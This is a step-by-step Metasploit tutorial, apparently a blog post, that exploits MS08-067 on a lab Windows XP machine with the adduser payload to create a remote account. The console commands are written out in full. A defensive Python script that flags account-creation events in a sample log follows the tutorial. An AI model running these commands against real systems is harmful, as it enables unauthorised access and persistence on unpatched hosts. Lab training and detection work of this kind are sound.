Metasploit/Exploit #2: How to Hack and Remotely Create a New Windows User





In this tutorial, I'm going to show how to hack and remotely create a new Windows user. Please check my other tutorial on how to set up a virtual lab for hacking and penetration testing. My targeted machine is running Windows XP Service Pack 2.


Steps

  1. Search for an exploit for a known system vulnerability.
  2. Set the Payload.
  3. Exploit.
  4. Check Windows XP login panel.

Steps Details


1) Search for an exploit for a known system vulnerability.

1.1) Search for the module called "netapi".

1.2) Use the "netapi" module to launch an exploit. Copy the exploit name.

Type "use exploit/windows/smb/ms08_067_netapi"

Display the existing configuration by typing "show options".

1.3) Set the RHOST (Remote Host) IP address. In this tutorial, my targeted machine's IP address is 10.10.10.4.

Type "set RHOST 10.10.10.4"


2) Set the Payload

2.1) Next, you need to set up the payload. The payload executes a task once we break into the system. The payload that we want to use is called windows/adduser. This payload will create a single user on the compromised system.

Type "set PAYLOAD windows/adduser"

2.2) You can also set the username and password for the new Windows user in the payload settings. To display the settings,

Type "show options"

"PASS" is where you set the password and "USER" is where you set the username.

In this example, I will use the existing username, which is "metasploit", and I will change my current password to "Metasploit1234". To change the password,

Type "set PASS Metasploit1234"
3) Exploit.

3.1) Type "show options" to display the configured exploit and payload. To exploit the Windows system,

Type "exploit"

Once it has finished executing, the console will report "Exploit completed, but no session was created". This is because the payload that we set executes only one job. Since I'm running in my virtual lab, I can check my Windows system in VirtualBox.



4) Check Windows XP login panel.

4.1) Log off your current session by going to "Start > Log Off".

4.2) Choose to switch the Windows user.

4.3) Choose your new user. In this example, my new user is "metasploit" with "Metasploit1234" as its password.

A new Windows user was created from Metasploit!
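
From the defender's side, the account this payload creates shows up in the target's Security event log when account-management auditing is enabled. The following is an added example, not part of the original tutorial: it scans a constructed CSV export for account-creation events (ID 624 on Windows XP, 4720 on later versions). The column layout, host names and the "created from a service context" heuristic are assumptions.

```python
import csv
import io

# Security-log event IDs for "user account created":
# 624 on Windows XP/2003, 4720 on Vista/2008 and later.
ACCOUNT_CREATED_IDS = {"624", "4720"}

# Constructed sample export (hypothetical column layout, not real log data).
SAMPLE_LOG = """\
time,event_id,computer,new_account,caller
2024-01-10T09:12:01,624,XP-LAB,helpdesk1,labadmin
2024-01-10T09:40:17,528,XP-LAB,,labadmin
2024-01-10T10:03:44,624,XP-LAB,metasploit,XP-LAB$
2024-01-10T10:20:09,4720,WS-07,svc_backup,SYSTEM
"""

def is_service_context(caller, computer):
    """True when the creator is the machine itself rather than a person."""
    caller = caller.strip().upper()
    return caller == "SYSTEM" or caller == computer.strip().upper() + "$"

def find_suspicious_creations(log_text, approved_admins):
    """Return account-creation events not attributable to an approved admin."""
    findings = []
    for row in csv.DictReader(io.StringIO(log_text)):
        if row["event_id"] not in ACCOUNT_CREATED_IDS:
            continue  # ignore logons and other unrelated events
        caller = row["caller"]
        if is_service_context(caller, row["computer"]):
            # Assumed heuristic: no person was logged on as the creator.
            reason = "created from a service (machine) context"
        elif caller.lower() not in approved_admins:
            reason = "created by an unapproved caller"
        else:
            continue  # created by a known administrator
        findings.append((row["time"], row["computer"], row["new_account"], reason))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious_creations(SAMPLE_LOG, {"labadmin"}):
        print(" | ".join(finding))
```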